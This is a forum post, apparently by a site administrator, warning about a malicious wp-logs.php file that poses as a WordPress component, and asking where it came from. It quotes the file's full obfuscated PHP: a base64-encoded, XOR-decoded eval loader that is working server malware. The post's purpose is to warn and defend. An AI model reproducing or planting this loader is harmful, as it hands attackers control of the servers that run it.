wp-logs.php

This is actually not related to wordpress at all, but since the file is trying to impersonate a component of wordpress I thought I would post here. Basically there is a wp-logs.php script that get’s run. Code looks like this:

<?eval(base64_decode(“JGs9MTQyOyRtPWV4cGxvZGUoIjsiLCIxNzA7MjM3OzE3NDsxNzk7MTc0OzIzNzsyNTE7MjUyOzIyNjsyMDk7MjMxOzIyNDsyMzE7MjUwOzE2NjsxNjc7MTgxOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjUzOzIzNTsyNTA7MjI1OzI1NDsyNTA7MTY2OzE3MDsyMzc7MTYyOzE3NDsyMDU7MjE5OzIyMDsxOTQ7MTkzOzIyMjsyMTg7MjA5OzIwMDsyMDc7MTk5OzE5NDsxOTM7MTkyOzIwMzsyMjA7MjIwOzE5MzsyMjA7MTYyOzE3NDsyNTA7MjUyOzI1MTsyMzU7MTY3OzE4MTsyMzc7MjUxOzI1MjsyMjY7MjA5OzI1MzsyMzU7MjUwOzIyNTsyNTQ7MjUwOzE2NjsxNzA7MjM3OzE2MjsxNzQ7MjA1OzIxOTsyMjA7MTk0OzE5MzsyMjI7MjE4OzIwOTsyMDA7MTkzOzE5NDsxOTQ7MTkzOzIxNzsxOTQ7MTkzOzIwNTsyMDc7MjE4OzE5OTsxOTM7MTkyOzE2MjsxNzQ7MjUwOzI1MjsyNTE7MjM1OzE2NzsxODE7MjM3OzI1MTsyNTI7MjI2OzIwOTsyNTM7MjM1OzI1MDsyMjU7MjU0OzI1MDsxNjY7MTcwOzIzNzsxNjI7MTc0OzIwNTsyMTk7MjIwOzE5NDsxOTM7MjIyOzIxODsyMDk7MjAzOzE5MjsyMDU7MTkzOzIwMjsxOTk7MTkyOzIwMTsxNzQ7MTYyOzE3NDsxNjk7MjMzOzI0NDsyMzE7MjU0OzE2MjsxNzQ7MjM0OzIzNTsyMzI7MjI2OzIzOTsyNTA7MjM1OzE2OTsxNjc7MTgxOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjUzOzIzNTsyNTA7MjI1OzI1NDsyNTA7MTY2OzE3MDsyMzc7MTYyOzE3NDsyMDU7MjE5OzIyMDsxOTQ7MTkzOzIyMjsyMTg7MjA5OzIyMTsyMjE7MTk0OzIwOTsyMTY7MjAzOzIyMDsxOTk7MjAwOzIxNTsyMjI7MjAzOzIwMzsyMjA7MTYyOzE3NDsxOTA7MTY3OzE4MTsyMzc7MjUxOzI1MjsyMjY7MjA5OzI1MzsyMzU7MjUwOzIyNTsyNTQ7MjUwOzE2NjsxNzA7MjM3OzE2MjsxNzQ7MjA1OzIxOTsyMjA7MTk0OzE5MzsyMjI7MjE4OzIwOTsyMTk7MjIxOzIwMzsyMjA7MjA3OzIwMTsyMDM7MTkyOzIxODsxNjI7MTc0OzE3MjsxOTM7MjU0OzIzNTsyNTI7MjM5OzE2MTsxODM7MTYwOzE4NzsxOTE7MTc0OzE2NjsyMTc7MjMxOzIyNDsyMzQ7MjI1OzI0OTsyNTM7MTc0OzE5MjsyMTg7MTc0OzE4NzsxNjA7MTkxOzE4MTsxNzQ7MjE5OzE4MTsxNzQ7MjUxOzI1MzsxNjc7MTcyOzE2NzsxODE7MjM3OzI1MTsyNTI7MjI2OzIwOTsyNTM7MjM1OzI1MDsyMjU7MjU0OzI1MDsxNjY7MTcwOzIzNzsxNjI7MTc0OzIwNTsyMTk7MjIwOzE5NDsxOTM7MjIyOzIxODsyMDk7MjE5OzIyMDsxOTQ7MTYyOzE3NDsxNzA7MjA5OzIyMDsyMDM7MjIzOzIxOTsyMDM7MjIxOzIxODsyMTM7MTY5OzIyNTsyMjk7MjI0OzIyNTsyNDk7MTY5OzIxMTsxNjc7MTgxOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjUzOzIzNTsyNTA7MjI1OzI1NDsyNTA7MTY2OzE3MDsyMzc7MTYyOzE3NDsyMDU7MjE5OzIyMDsxOTQ7MTkzOzIyMjsyMTg7MjA5OzIyMDsyMDM7MjE4OzIxOTsyMjA7MTkyOzIxODsyMjA7MjA3OzE5MjsyMjE7MjAwOzIwMzsyMjA7MTYyOzE3NDsyNTA7MjUyOzI1MTsyMzU7MTY3OzE4MTsxNzA7MjI1OzE3NDsxNzk7MTc0OzIzNzsyNTE7MjUyOzIyNjsyMDk7MjM1OzI0NjsyMzU7MjM3OzE2NjsxNzA7MjM3OzE2NzsxODE7MjMxOzIzMjsxNjY7MjM3OzI1MTsyNTI7MjI2OzIwOTsyMzU7MjUyOzI1MjsyMjQ7MjI1OzE2NjsxNzA7MjM3OzE2NzsxNjc7MTc0OzI0NTsxMzU7MjM1OzIzNzsyMzA7MjI1OzE2OTsxNzg7MTc1OzE2MzsxNjM7MTc0OzI1MTsxODk7MjUyOzE4NzsyNDk7MTg1OzIzNTsxNzQ7MTYzOzE2MzsxNzY7MTY5OzE2MDsxNzA7MjI1OzE4MTsyMzU7MjM3OzIzMDsyMjU7MTc0OzE3MjsyMDM7MjUyOzI1MjsyMjU7MjUyOzE3NDsyMjQ7MjUxOzIyNzsyMzY7MjM1OzI1MjsxODA7MTc0OzE3MjsxNzQ7MTYwOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjM1OzI1MjsyNTI7MjI0OzIyNTsxNjY7MTcwOzIzNzsxNjc7MTc0OzE2MDsxNzI7MjEwOzIyNDsxNzI7MTgxOzIzNTsyMzc7MjMwOzIyNTsxNzQ7MTcyOzIwMzsyNTI7MjUyOzIyNTsyNTI7MTc0OzIyNzsyMzU7MjUzOzI1MzsyMzk7MjMzOzIzNTsxODA7MTc0OzE3MjsxNzQ7MTYwOzIzNzsyNTE7MjUyOzIyNjsyMDk7MjM1OzI1MjsyNTI7MjI1OzI1MjsxNjY7MTcwOzIzNzsxNjc7MTYwOzE3MjsyMTA7MjI0OzE3MjsxODE7MjQzOzE3NDsyMzU7MjI2OzI1MzsyMzU7MTc0OzI0NTsyMzU7MjM3OzIzMDsyMjU7MTY5OzE3ODsxNzU7MTYzOzE2MzsxNzQ7MjUxOzE4ODsyNTI7MTg2OzI0OTsxODQ7MjM1OzE3NDsxNjM7MTYzOzE3NjsxNjk7MTYwOzE3MDsyMjU7MTgxOzI0MzsiKTskej0iIjtmb3JlYWNoKCRtIGFzICR2KWlmICgkdiE9IiIpJHouPWNocigkdl4kayk7ZXZhbCgkeik7”));?>

If you find this running on your server, get rid of it. I still haven’t found what was the original exploit that got this on the server in the first place, working on it. Please post here if you have found the source of the exploit or have any additional useful information.